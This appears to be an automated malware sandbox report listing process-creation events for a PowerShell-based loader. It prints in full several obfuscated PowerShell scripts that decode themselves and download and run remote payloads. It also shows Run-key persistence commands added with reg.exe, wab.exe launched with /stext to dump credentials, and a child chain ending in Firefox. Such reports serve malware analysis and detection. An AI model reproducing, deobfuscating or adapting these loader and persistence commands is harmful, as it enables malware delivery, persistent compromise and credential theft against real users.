lPiiVatPa(Ta$DeJKoeDij.nu anSiefe2Ka0 ,3Se)Hy ');Sloshily (Indbandtes ' F[MoNUre tC .AlS.ee .r,hv Mi.kc ,e APLeoIniC,nPet,iMToaBln.eaApgHeeTrr t]D.:Es: eSBreAecKouObr.hisatTuyBePDrr Eo,rt.ao gc no lNa H,=Le M[FoNPae otOp. SChePac .uBerKiiPrtBey,cPt.r oButUnoRec Ho ,lF,TShyPop XeSl]Dr:K :S,T SlFosB.1Ir2To ');$Reveled=$Blodskamsforholds[0];$Lnindeholde= (Indbandtes ',o$ g.il SoRhbLia Kln,: AG Vn,uaChv,oeDer.hi.ee .t es =KaN.ceV.w e-lrOU,b OjTre,ocPrt TST yBls TtG.e FmKr.slNA.e.kt.e.MdW etrbDrCInlSoiAjeOvnGyt');$Lnindeholde+=$Arninge[1];Sloshily ($Lnindeholde);Sloshily (Indbandtes 'Fo$UnG Fn GaC,vFleAfrRaiAdePrt,hs S.KrHAdeDeaLsdS eNyr,rsGe[Ag$UnHK.e snVgnBre Us s]Ov= E$GuV ,eSclMop ,rDroVeer.v eCrtSk ');$Billardkers=Indbandtes 'Sa$.vGUnn,raCovAneU,r oiO,eCatLysn,.CoDCaoBrwP.nTel UoKoa kdRaF ri .lPreMe(.j$HaRNeeDrvO,eFal,nemed B,Fo$PaG Oe Mr omS.a unUniS.eS,sJ.) . ';$Germanies=$Arninge[0];Sloshily (Indbandtes 'Sa$TngSclWhoFob Ba AlC,: ,S .aSta,frE r TaBrnFrdCteMenRa4 c=Di(S T meflsOrt.r-StPScaOrt .hC lu$PrGSkePyr Fmasaman KiS.e,esK,)Bu ');while (!$Saarranden4) {Sloshily (Indbandtes 'Ly$,ugK.lF o sbSuaStlFo:AnN .oafn.yf.oaWevSeoA,r Ga ObEul,ue,r= .$SatM.r CuNoe T ') ;Sloshily $Billardkers;Sloshily (Indbandtes 'MuStotP.a,erU.t -BaS PlMieDueTep e G.4Tr ');Sloshily (Indbandtes 'ge$OvgBalU oRibanaCil H: GS.naJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Negligent.Gas && echo t"Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "If (${host}.CurrentUICulture) {$Afgiftskolonners42nchamber='SUBsTR';$Apocrisiary++;}$Afgiftskolonners42nchamber+='ing';Function Indbandtes($Forsimple){$Afrettere=$Forsimple.Length-$Apocrisiary;For( $Afgiftskolonners42=2;$Afgiftskolonners42 -lt $Afrettere;$Afgiftskolonners42+=3){$Nedgangene+=$Forsimple.$Afgiftskolonners42nchamber.'Invoke'( $Afgiftskolonners42, $Apocrisiary);}$Nedgangene;}function Sloshily($Parasollernes){ & ($Paprr) ($Parasollernes);}$Velproevet=Indbandtes 'HeMB.o dzM,i.elFil Sa u/Sc5 P. G0Ry n( SW,oi.an.md,to Tw.hs . S.NS,TSe S1.o0Ar.He0Ca; H ,eWHji nnKi6 .4su;Pr TyxBo6,v4G ;Ke UlrD v A: ,1 D2 e1Ch.Pr0Di)Se ,rGr.e Mc ,kB.oFo/Se2Fe0Ca1 B0Su0R 1In0S,1R O,FSliInrMue SfduoAuxF./L,1Zi2Ar1R.. u0al ';$Hennes=Indbandtes ' ,UDisEpeA.rG -GgA eg ,ey.nBytB. ';$Reveled=Indbandtes 'SthF.tSetF.pHos.l:Po/.o/awa ,vUno,rcHyaRelofdNao Dp.oeT r huRe.idcNooC.m.r/NeJDrofyuCos .e ,4Ma. .p n BgA.>Mih.itQttDep os.o:Fr/In/R a vS.oGacSkapilO,dsoo ,p ,eBerS,u.ao enPreAn.SocR.oSymFj/ .JE,oCouArsVieB 4,d.Fap BnB,g , ';$Jejune203=Indbandtes 'Va>In ';$Paprr=Indbandtes 'B,iP,e hx H ';$Gushet='Zaristiske';$Ansvarsbevidsthed = Indbandtes 'FoeAac,vhGuo E Me%CoaG pJ pKudAdaS t Ba,u%,l\LiN ,eskgMalc.iL.gReeP.nBrt P.NoGN.a Bs S He& P& i ,oeA,cOmhB os. Ptul ';Sloshily (Indbandtes ' U$Prg GlVeo.eb a rlGl: .AObrS,n.pi Ln CgFoePa=S,( lc emSmdRe i./SicAl Fi$S,AAbn,as Av oaoprLasBub.reA v Si udalsPotHehUde .dRi) C ');Sloshily (Indbandtes 'Co$Deg TlTaoG.bpeaAclSu:MoBPalSeoJedS.s .kSma tmTesUnf,oo .rSphUnoAllM dInsP,=Sl$ MR Re fvEke rlcaeV dAd.Ves.lpU lPiiVatPa(Ta$DeJKoeDij.nu anSiefe2Ka0 ,3Se)Hy ');Sloshily (Indbandtes ' F[MoNUre tC .AlS.ee .r,hv Mi.kc ,e APLeoIniC,nPet,iMToaBln.eaApgHeeTrr t]D.:Es: eSBreAecKouObr.hisatTuyBePDrr Eo,rt.ao gc no lNa H,=Le M[FoNPae otOp. SChePac .uBerKiiPrtBey,cPt.r oButUnoRec Ho ,lF,TShyPop XeSl]Dr:K :S,T SlFosB.1Ir2To ');$Reveled=$Blodskamsforholds[0];$Lnindeholde= (Indbandtes ',o$ g.il SoRhbLia Kln,: AG Vn,uaChv,oeDer.hi.ee .t es =KaN.ceV.w e-lrOU,b OjTre,ocPrt TST yBls TtG.e FmKr.slNA.e.kt.e.MdW etrbDrCInlSoiAjeOvnGyt');$Lnindeholde+=$Arninge[1];Sloshily ($Lnindeholde);Sloshily (Indbandtes 'Fo$UnG Fn GaC,vFleAfrRaiAdePrt,hs S.KrHAdeDeaLsdS eNyr,rsGe[Ag$UnHK.e snVgnBre Us s]Ov= E$GuV ,eSclMop ,rDroVeer.v eCrtSk ');$Billardkers=Indbandtes 'Sa$.vGUnn,raCovAneU,r oiO,eCatLysn,.CoDCaoBrwP.nTel UoKoa kdRaF ri .lPreMe(.j$HaRNeeDrvO,eFal,nemed B,Fo$PaG Oe Mr omS.a unUniS.eS,sJ.) . ';$Germanies=$Arninge[0];Sloshily (Indbandtes 'Sa$TngSclWhoFob Ba AlC,: ,S .aSta,frE r TaBrnFrdCteMenRa4 c=Di(S T meflsOrt.r-StPScaOrt .hC lu$PrGSkePyr Fmasaman KiS.e,esK,)Bu ');while (!$Saarranden4) {Sloshily (Indbandtes 'Ly$,ugK.lF o sbSuaStlFo:AnN .oafn.yf.oaWevSeoA,r Ga ObEul,ue,r= .$SatM.r CuNoe T ') ;Sloshily $Billardkers;Sloshily (Indbandtes 'MuStotP.a,erU.t -BaS PlMieDueTep e G.4Tr ');Sloshily (Indbandtes 'ge$OvgJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Negligent.Gas && echo t"Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe"Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Almindeligheden" /t REG_EXPAND_SZ /d "%outoven% -w 1 $Epilabra=(Get-ItemProperty -Path 'HKCU:\Neglective\').Tveboplantes;%outoven% ($Epilabra)"Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\Andragendet8.vbs" Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\nywdnxhzquvbdzxsrjdoxzvr"Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\nywdnxhzquvbdzxsrjdoxzvr"Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\yakooqrtecnnfflwatqqaeiadgh"Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\iupgoicvskfsqlharedrlrcrlmrxexz"Jump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Almindeligheden" /t REG_EXPAND_SZ /d "%outoven% -w 1 $Epilabra=(Get-ItemProperty -Path 'HKCU:\Neglective\').Tveboplantes;%outoven% ($Epilabra)"Jump to behavior
              Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "If (${host}.CurrentUICulture) {$alismataceae='SUBsTR';$Lotah++;}$alismataceae+='ing';Function Viscometres($Rubellosis){$Overdaadigt=$Rubellosis.Length-$Lotah;For( $dekanterendes=2;$dekanterendes -lt $Overdaadigt;$dekanterendes+=3){$Firblads159+=$Rubellosis.$alismataceae.'Invoke'( $dekanterendes, $Lotah);}$Firblads159;}function Tilfredsstillelse($konerne){ . ($Hemibasidiomycetes) ($konerne);}$Annegretes=Viscometres 'BuMVio.lzNyiEfl,ilPraPr/Sn5Te.Fr0f ,l(gaW Ti.anSpds o,aw asFi h N aTAs z1,a0Sy.ud0Bi;bi TpW ,iOpnV,6Te4 C; r Bix P6Ud4Ng; ,trUnv ,: .1Sk2,r1,l.Di0Va),n ,GPre .cSkk oG,/Sm2Fa0R.1Ug0 .0ap1So0 R1Ge VeFS.iSar deStfrioRaxKu/ 1 P2,h1Os. .0 , ';$Milieuplanerne=Viscometres 'YoUVesLreTerPr-W A,rgRhe,yn,ct.u ';$Bageriers=Viscometres 'EnhFotAnt p L:Re/.l/IlcN.p.oaJunS.e lC.-Sma ndD.m ,iOpnT.h uoPesF t E..fcU.oKom.a/DeS PtN emevChnSts T1Ta7 C9Si.R mYoiAux.o ';$Arish=Viscometres 'Se>Re ';$Hemibasidiomycetes=Viscometres 'AmiGeePrxUd ';$Svaerd='Incisal';$dekanterendesndoneser = Viscometres 'w,er,cExh eoCh F %ReaInpCap dL aP,tU.aMo%H.\ChBLie.olAsi Un SdToaDe1Ch0 .3 .XoETofInt,t ,&Co& S SeMec EhS.o,i Gltuf ';Tilfredsstillelse (Viscometres 'Me$.ig olBloEdbGua.llD,:HiSEtt Mo AnS.e Er.foNioLatE = S(ArcTym.edWl M / rc U K$ ndD,e ,k GaKanEftI eOprT.e onOudHne.osTan,idPuo,on LeKes ieNurLs),f ');Tilfredsstillelse (Viscometres 'ta$Ovg klSpoKrbS aUnl ,:JoL ieH v de draneYed TeResBo=I.$ KBZia VgreeR,r,ei eePyr Eshy.TrsT,pErl.aitat,e( .$,oA .rRaiEnsSch O)Ph ');Tilfredsstillelse (Viscometres 'T,[JoN LeKrt.n.VaS e ur v,oiSic .eCaP,co Ki .nKntD,MFiacrn CaVagAse erR ] e:De:,oS eAfcHauFrrF iEntPryTaPLirBeoMet soPecM.o.il K Es=M ,d[ ONSte .tSj. ,SAfeN,cKruT r TiUntcoysoPSkr Aot t oHjc Ao,glBoTFiyBrpQ e.e] C:Va:U.T ,lS.s f1,r2.r ');$Bageriers=$Leveredes[0];$Varmeslangens= (Viscometres 'Cu$Dig wl DoP.bSkaVal :UiLC.iGeg eAnsIntO,iStl Ml ii SnSugFieB,r.nnF.e Lsda=DiNEneP wAn-woOskb TjB,eQ,cM.t PS.ayHus Nt.le Smdi.HiNcheCotfo.NoWExeSpb.mCT,l TiEmeDin Dt');$Varmeslangens+=$Stoneroot[1];Tilfredsstillelse ($Varmeslangens);Tilfredsstillelse (Viscometres 'Or$ oL Gi bgR,eG,sZit Cibrl.ul ,iT.nMigKleNorFonUne s r.GlHree DaPedDie,orBls.f[Af$KoMPaiFelTri se ,u sp Flora.unSte Fr,kn .e,a]Go=Me$MeA Bn,kn ,e PgHir keGat deFesJe ');$Mosegrundene=Viscometres ' E$ .LK.i.rg SeVus,etGii,olP lNei ,nGeg,oeMyrLinDreNas O.flD NoAlwInnSulhyoKraU.dSpFski PlS eKr(kr$ ,BFua cgBneFirReiSte,trHesBr,,r$BeR keFoh ,aRarLidIne ,nFu) D ';$Reharden=$Stoneroot[0];Tilfredsstillelse (Viscometres ',e$ g .lMoo Db ,aEnl R: HFShu osHaiTioEan Bs.daR,aMer.te HnDreNo=Vi(,yTWieVrsF t - .P sa.mt Mh s .o$SvR MePuhBra orRedSpeUnnRe) a ');while (!$Fusionsaarene) {Tilfredsstillelse (Viscometres 'Af$.ogEmlReo SbUna ,lLs: iNBroBon OsBioPrlReuPeb.nlClyFr=C.$MitRarLau eK ') ;Tilfredsstillelse $Mosegrundene;Tilfredsstillelse (Viscometres 'UnS tt Ma.ir Rt a- TSPilS eTreFap V ,Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Belinda103.Eft && echo t"
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "If (${host}.CurrentUICulture) {$alismataceae='SUBsTR';$Lotah++;}$alismataceae+='ing';Function Viscometres($Rubellosis){$Overdaadigt=$Rubellosis.Length-$Lotah;For( $dekanterendes=2;$dekanterendes -lt $Overdaadigt;$dekanterendes+=3){$Firblads159+=$Rubellosis.$alismataceae.'Invoke'( $dekanterendes, $Lotah);}$Firblads159;}function Tilfredsstillelse($konerne){ . ($Hemibasidiomycetes) ($konerne);}$Annegretes=Viscometres 'BuMVio.lzNyiEfl,ilPraPr/Sn5Te.Fr0f ,l(gaW Ti.anSpds o,aw asFi h N aTAs z1,a0Sy.ud0Bi;bi TpW ,iOpnV,6Te4 C; r Bix P6Ud4Ng; ,trUnv ,: .1Sk2,r1,l.Di0Va),n ,GPre .cSkk oG,/Sm2Fa0R.1Ug0 .0ap1So0 R1Ge VeFS.iSar deStfrioRaxKu/ 1 P2,h1Os. .0 , ';$Milieuplanerne=Viscometres 'YoUVesLreTerPr-W A,rgRhe,yn,ct.u ';$Bageriers=Viscometres 'EnhFotAnt p L:Re/.l/IlcN.p.oaJunS.e lC.-Sma ndD.m ,iOpnT.h uoPesF t E..fcU.oKom.a/DeS PtN emevChnSts T1Ta7 C9Si.R mYoiAux.o ';$Arish=Viscometres 'Se>Re ';$Hemibasidiomycetes=Viscometres 'AmiGeePrxUd ';$Svaerd='Incisal';$dekanterendesndoneser = Viscometres 'w,er,cExh eoCh F %ReaInpCap dL aP,tU.aMo%H.\ChBLie.olAsi Un SdToaDe1Ch0 .3 .XoETofInt,t ,&Co& S SeMec EhS.o,i Gltuf ';Tilfredsstillelse (Viscometres 'Me$.ig olBloEdbGua.llD,:HiSEtt Mo AnS.e Er.foNioLatE = S(ArcTym.edWl M / rc U K$ ndD,e ,k GaKanEftI eOprT.e onOudHne.osTan,idPuo,on LeKes ieNurLs),f ');Tilfredsstillelse (Viscometres 'ta$Ovg klSpoKrbS aUnl ,:JoL ieH v de draneYed TeResBo=I.$ KBZia VgreeR,r,ei eePyr Eshy.TrsT,pErl.aitat,e( .$,oA .rRaiEnsSch O)Ph ');Tilfredsstillelse (Viscometres 'T,[JoN LeKrt.n.VaS e ur v,oiSic .eCaP,co Ki .nKntD,MFiacrn CaVagAse erR ] e:De:,oS eAfcHauFrrF iEntPryTaPLirBeoMet soPecM.o.il K Es=M ,d[ ONSte .tSj. ,SAfeN,cKruT r TiUntcoysoPSkr Aot t oHjc Ao,glBoTFiyBrpQ e.e] C:Va:U.T ,lS.s f1,r2.r ');$Bageriers=$Leveredes[0];$Varmeslangens= (Viscometres 'Cu$Dig wl DoP.bSkaVal :UiLC.iGeg eAnsIntO,iStl Ml ii SnSugFieB,r.nnF.e Lsda=DiNEneP wAn-woOskb TjB,eQ,cM.t PS.ayHus Nt.le Smdi.HiNcheCotfo.NoWExeSpb.mCT,l TiEmeDin Dt');$Varmeslangens+=$Stoneroot[1];Tilfredsstillelse ($Varmeslangens);Tilfredsstillelse (Viscometres 'Or$ oL Gi bgR,eG,sZit Cibrl.ul ,iT.nMigKleNorFonUne s r.GlHree DaPedDie,orBls.f[Af$KoMPaiFelTri se ,u sp Flora.unSte Fr,kn .e,a]Go=Me$MeA Bn,kn ,e PgHir keGat deFesJe ');$Mosegrundene=Viscometres ' E$ .LK.i.rg SeVus,etGii,olP lNei ,nGeg,oeMyrLinDreNas O.flD NoAlwInnSulhyoKraU.dSpFski PlS eKr(kr$ ,BFua cgBneFirReiSte,trHesBr,,r$BeR keFoh ,aRarLidIne ,nFu) D ';$Reharden=$Stoneroot[0];Tilfredsstillelse (Viscometres ',e$ g .lMoo Db ,aEnl R: HFShu osHaiTioEan Bs.daR,aMer.te HnDreNo=Vi(,yTWieVrsF t - .P sa.mt Mh s .o$SvR MePuhBra orRedSpeUnnRe) a ');while (!$Fusionsaarene) {Tilfredsstillelse (Viscometres 'Af$.ogEmlReo SbUna ,lLs: iNBroBon OsBioPrlReuPeb.nlClyFr=C.$MitRarLau eK ') ;Tilfredsstillelse $Mosegrundene;Tilfredsstillelse (Viscometres 'UnS tt Ma.ir Rt a- TSPilS eTreFap V ,
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Belinda103.Eft && echo t"
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe"
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Bilateralities" /t REG_EXPAND_SZ /d "%Arrestationernes110% -w 1 $Faucals83=(Get-ItemProperty -Path 'HKCU:\sttyskers\').talevant;%Arrestationernes110% ($Faucals83)"
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Bilateralities" /t REG_EXPAND_SZ /d "%Arrestationernes110% -w 1 $Faucals83=(Get-ItemProperty -Path 'HKCU:\sttyskers\').talevant;%Arrestationernes110% ($Faucals83)"
              Source: C:\Program Files (x86)\mEdjCLhGENFaxeOtHHyHLogHIxTeNJwCnROkqpaCmxInxofnfbtq\qeKrnFkDzDT.exeProcess created: C:\Windows\SysWOW64\srdelayed.exe "C:\Windows\SysWOW64\srdelayed.exe"
              Source: C:\Program Files (x86)\mEdjCLhGENFaxeOtHHyHLogHIxTeNJwCnROkqpaCmxInxofnfbtq\qeKrnFkDzDT.exeProcess created: C:\Windows\SysWOW64\relog.exe "C:\Windows\SysWOW64\relog.exe"
              Source: C:\Windows\SysWOW64\relog.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden "if (${host}.currentuiculture) {$afgiftskolonners42nchamber='substr';$apocrisiary++;}$afgiftskolonners42nchamber+='ing';function indbandtes($forsimple){$afrettere=$forsimple.length-$apocrisiary;for( $afgiftskolonners42=2;$afgiftskolonners42 -lt $afrettere;$afgiftskolonners42+=3){$nedgangene+=$forsimple.$afgiftskolonners42nchamber.'invoke'( $afgiftskolonners42, $apocrisiary);}$nedgangene;}function sloshily($parasollernes){ & ($paprr) ($parasollernes);}$velproevet=indbandtes 'hemb.o dzm,i.elfil sa u/sc5 p. g0ry n( sw,oi.an.md,to tw.hs . s.ns,tse s1.o0ar.he0ca; h ,ewhji nnki6 .4su;pr tyxbo6,v4g ;ke ulrd v a: ,1 d2 e1ch.pr0di)se ,rgr.e mc ,kb.ofo/se2fe0ca1 b0su0r 1in0s,1r o,fsliinrmue sfduoauxf./l,1zi2ar1r.. u0al ';$hennes=indbandtes ' ,udisepea.rg -gga eg ,ey.nbytb. ';$reveled=indbandtes 'sthf.tsetf.phos.l:po/.o/awa ,vuno,rchyarelofdnao dp.oet r hure.idcnooc.m.r/nejdrofyucos .e ,4ma. .p n bga.>mih.itqttdep os.o:fr/in/r a vs.ogacskapilo,dsoo ,p ,ebers,u.ao enprean.socr.osymfj/ .je,ocouarsvieb 4,d.fap bnb,g , ';$jejune203=indbandtes 'va>in ';$paprr=indbandtes 'b,ip,e hx h ';$gushet='zaristiske';$ansvarsbevidsthed = indbandtes 'foeaac,vhguo e me%coag pj pkudadas t ba,u%,l\lin ,eskgmalc.il.greep.nbrt p.nogn.a bs s he& p& i ,oea,comhb os. ptul ';sloshily (indbandtes ' u$prg glveo.eb a rlgl: .aobrs,n.pi ln cgfoepa=s,( lc emsmdre i./sical fi$s,aabn,as av oaoprlasbub.rea v si udalspothehude .dri) c ');sloshily (indbandtes 'co$deg tltaog.bpeaaclsu:mobpalseojeds.s .ksma tmtesunf,oo .rsphunoallm dinsp,=sl$ mr re fveke rlcaev dad.ves.lpu lpiivatpa(ta$dejkoedij.nu ansiefe2ka0 ,3se)hy ');sloshily (indbandtes ' f[monure tc .als.ee .r,hv mi.kc ,e apleoinic,npet,imtoabln.eaapgheetrr t]d.:es: esbreaeckouobr.hisattuybepdrr eo,rt.ao gc no lna h,=le m[fonpae otop. schepac .uberkiiprtbey,cpt.r obutunorec ho ,lf,tshypop xesl]dr:k :s,t slfosb.1ir2to ');$reveled=$blodskamsforholds[0];$lnindeholde= (indbandtes ',o$ g.il sorhblia kln,: ag vn,uachv,oeder.hi.ee .t es =kan.cev.w e-lrou,b ojtre,ocprt tst ybls ttg.e fmkr.slna.e.kt.e.mdw etrbdrcinlsoiajeovngyt');$lnindeholde+=$arninge[1];sloshily ($lnindeholde);sloshily (indbandtes 'fo$ung fn gac,vfleafrraiadeprt,hs s.krhadedealsds enyr,rsge[ag$unhk.e snvgnbre us s]ov= e$guv ,esclmop ,rdroveer.v ecrtsk ');$billardkers=indbandtes 'sa$.vgunn,racovaneu,r oio,ecatlysn,.codcaobrwp.ntel uokoa kdraf ri .lpreme(.j$harneedrvo,efal,nemed b,fo$pag oe mr oms.a ununis.es,sj.) . ';$germanies=$arninge[0];sloshily (indbandtes 'sa$tngsclwhofob ba alc,: ,s .asta,fre r tabrnfrdctemenra4 c=di(s t meflsort.r-stpscaort .hc lu$prgskepyr fmasaman kis.e,esk,)bu ');while (!$saarranden4) {sloshily (indbandtes 'ly$,ugk.lf o sbsuastlfo:ann .oafn.yf.oawevseoa,r ga obeul,ue,r= .$satm.r cunoe t ') ;sloshily $billardkers;sloshily (indbandtes 'mustotp.a,eru.t -bas plmieduetep e g.4tr ');sloshily (indbandtes 'ge$ovgbalu oribanacil h: gs.na
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" "if (${host}.currentuiculture) {$afgiftskolonners42nchamber='substr';$apocrisiary++;}$afgiftskolonners42nchamber+='ing';function indbandtes($forsimple){$afrettere=$forsimple.length-$apocrisiary;for( $afgiftskolonners42=2;$afgiftskolonners42 -lt $afrettere;$afgiftskolonners42+=3){$nedgangene+=$forsimple.$afgiftskolonners42nchamber.'invoke'( $afgiftskolonners42, $apocrisiary);}$nedgangene;}function sloshily($parasollernes){ & ($paprr) ($parasollernes);}$velproevet=indbandtes 'hemb.o dzm,i.elfil sa u/sc5 p. g0ry n( sw,oi.an.md,to tw.hs . s.ns,tse s1.o0ar.he0ca; h ,ewhji nnki6 .4su;pr tyxbo6,v4g ;ke ulrd v a: ,1 d2 e1ch.pr0di)se ,rgr.e mc ,kb.ofo/se2fe0ca1 b0su0r 1in0s,1r o,fsliinrmue sfduoauxf./l,1zi2ar1r.. u0al ';$hennes=indbandtes ' ,udisepea.rg -gga eg ,ey.nbytb. ';$reveled=indbandtes 'sthf.tsetf.phos.l:po/.o/awa ,vuno,rchyarelofdnao dp.oet r hure.idcnooc.m.r/nejdrofyucos .e ,4ma. .p n bga.>mih.itqttdep os.o:fr/in/r a vs.ogacskapilo,dsoo ,p ,ebers,u.ao enprean.socr.osymfj/ .je,ocouarsvieb 4,d.fap bnb,g , ';$jejune203=indbandtes 'va>in ';$paprr=indbandtes 'b,ip,e hx h ';$gushet='zaristiske';$ansvarsbevidsthed = indbandtes 'foeaac,vhguo e me%coag pj pkudadas t ba,u%,l\lin ,eskgmalc.il.greep.nbrt p.nogn.a bs s he& p& i ,oea,comhb os. ptul ';sloshily (indbandtes ' u$prg glveo.eb a rlgl: .aobrs,n.pi ln cgfoepa=s,( lc emsmdre i./sical fi$s,aabn,as av oaoprlasbub.rea v si udalspothehude .dri) c ');sloshily (indbandtes 'co$deg tltaog.bpeaaclsu:mobpalseojeds.s .ksma tmtesunf,oo .rsphunoallm dinsp,=sl$ mr re fveke rlcaev dad.ves.lpu lpiivatpa(ta$dejkoedij.nu ansiefe2ka0 ,3se)hy ');sloshily (indbandtes ' f[monure tc .als.ee .r,hv mi.kc ,e apleoinic,npet,imtoabln.eaapgheetrr t]d.:es: esbreaeckouobr.hisattuybepdrr eo,rt.ao gc no lna h,=le m[fonpae otop. schepac .uberkiiprtbey,cpt.r obutunorec ho ,lf,tshypop xesl]dr:k :s,t slfosb.1ir2to ');$reveled=$blodskamsforholds[0];$lnindeholde= (indbandtes ',o$ g.il sorhblia kln,: ag vn,uachv,oeder.hi.ee .t es =kan.cev.w e-lrou,b ojtre,ocprt tst ybls ttg.e fmkr.slna.e.kt.e.mdw etrbdrcinlsoiajeovngyt');$lnindeholde+=$arninge[1];sloshily ($lnindeholde);sloshily (indbandtes 'fo$ung fn gac,vfleafrraiadeprt,hs s.krhadedealsds enyr,rsge[ag$unhk.e snvgnbre us s]ov= e$guv ,esclmop ,rdroveer.v ecrtsk ');$billardkers=indbandtes 'sa$.vgunn,racovaneu,r oio,ecatlysn,.codcaobrwp.ntel uokoa kdraf ri .lpreme(.j$harneedrvo,efal,nemed b,fo$pag oe mr oms.a ununis.es,sj.) . ';$germanies=$arninge[0];sloshily (indbandtes 'sa$tngsclwhofob ba alc,: ,s .asta,fre r tabrnfrdctemenra4 c=di(s t meflsort.r-stpscaort .hc lu$prgskepyr fmasaman kis.e,esk,)bu ');while (!$saarranden4) {sloshily (indbandtes 'ly$,ugk.lf o sbsuastlfo:ann .oafn.yf.oawevseoa,r ga obeul,ue,r= .$satm.r cunoe t ') ;sloshily $billardkers;sloshily (indbandtes 'mustotp.a,eru.t -bas plmieduetep e g.4tr ');sloshily (indbandtes 'ge$ovg
              Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" "if (${host}.currentuiculture) {$alismataceae='substr';$lotah++;}$alismataceae+='ing';function viscometres($rubellosis){$overdaadigt=$rubellosis.length-$lotah;for( $dekanterendes=2;$dekanterendes -lt $overdaadigt;$dekanterendes+=3){$firblads159+=$rubellosis.$alismataceae.'invoke'( $dekanterendes, $lotah);}$firblads159;}function tilfredsstillelse($konerne){ . ($hemibasidiomycetes) ($konerne);}$annegretes=viscometres 'bumvio.lznyiefl,ilprapr/sn5te.fr0f ,l(gaw ti.anspds o,aw asfi h n atas z1,a0sy.ud0bi;bi tpw ,iopnv,6te4 c; r bix p6ud4ng; ,trunv ,: .1sk2,r1,l.di0va),n ,gpre .cskk og,/sm2fa0r.1ug0 .0ap1so0 r1ge vefs.isar destfrioraxku/ 1 p2,h1os. .0 , ';$milieuplanerne=viscometres 'youveslreterpr-w a,rgrhe,yn,ct.u ';$bageriers=viscometres 'enhfotant p l:re/.l/ilcn.p.oajuns.e lc.-sma ndd.m ,iopnt.h uopesf t e..fcu.okom.a/des ptn emevchnsts t1ta7 c9si.r myoiaux.o ';$arish=viscometres 'se>re ';$hemibasidiomycetes=viscometres 'amigeeprxud ';$svaerd='incisal';$dekanterendesndoneser = viscometres 'w,er,cexh eoch f %reainpcap dl ap,tu.amo%h.\chblie.olasi un sdtoade1ch0 .3 .xoetofint,t ,&co& s semec ehs.o,i gltuf ';tilfredsstillelse (viscometres 'me$.ig olbloedbgua.lld,:hisett mo ans.e er.foniolate = s(arctym.edwl m / rc u k$ ndd,e ,k gakanefti eoprt.e onoudhne.ostan,idpuo,on lekes ienurls),f ');tilfredsstillelse (viscometres 'ta$ovg klspokrbs aunl ,:jol ieh v de draneyed teresbo=i.$ kbzia vgreer,r,ei eepyr eshy.trst,perl.aitat,e( .$,oa .rraienssch o)ph 